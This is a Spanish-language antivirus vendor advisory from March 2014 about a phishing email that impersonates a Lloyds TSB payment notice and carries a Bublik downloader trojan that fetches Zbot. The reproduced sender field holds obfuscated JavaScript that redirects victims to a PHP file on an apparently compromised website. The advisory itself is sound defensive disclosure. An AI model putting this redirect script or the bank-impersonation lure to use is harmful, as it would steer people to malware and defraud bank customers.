EMAIL QUE SE ESTA RECIBIENDO CON ADJUNTO MALICIOSO BUBLIK

Se está recibiendo un mail masivo con estas características:
MAIL MALICIOSO:
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Asunto: You have received a new debit
De: “$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:PaymentsAdmin@lloydstsb.co.uk”>PaymentsAdmin@lloydstsb.co.uk>
Fecha: 18/03/2014 15:07
Para: <destinatario>
Tuesday 18 March 2014

This is an automatically generated email by the Lloyds TSB PLC LloydsLink online payments Service to inform you that you have receive a NEW Payment.

The details of the payment are attached.

This e-mail (including any attachments) is private and confidential and may contain privileged material. If you have received this e-mail in error, please notify the sender and delete it (including any attachments) immediately. You must not copy, distribute, disclose or use any of the information in it or any attachments.
anexo: Lloyds message service – debit posted.zip
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FIN MAIL MALICIOSO
Analizado el fichero anexado, ha resultado ser un DOWNLOADER TROJAN BUBLIK, que en la monitorizacion nos ha descargado un ZBOT que tambien pasamos a controlar

puede verse la informacion de este BUBLIK en:

https://blog.satinfo.es/2014/nueva-variante-de-trojan-bublik-que-descarga-zbot/
La version del ELISTARA 29.60 que los controla y elimina ya estan disponible en nuestra web

saludos

ms, 19-3-2014

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NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
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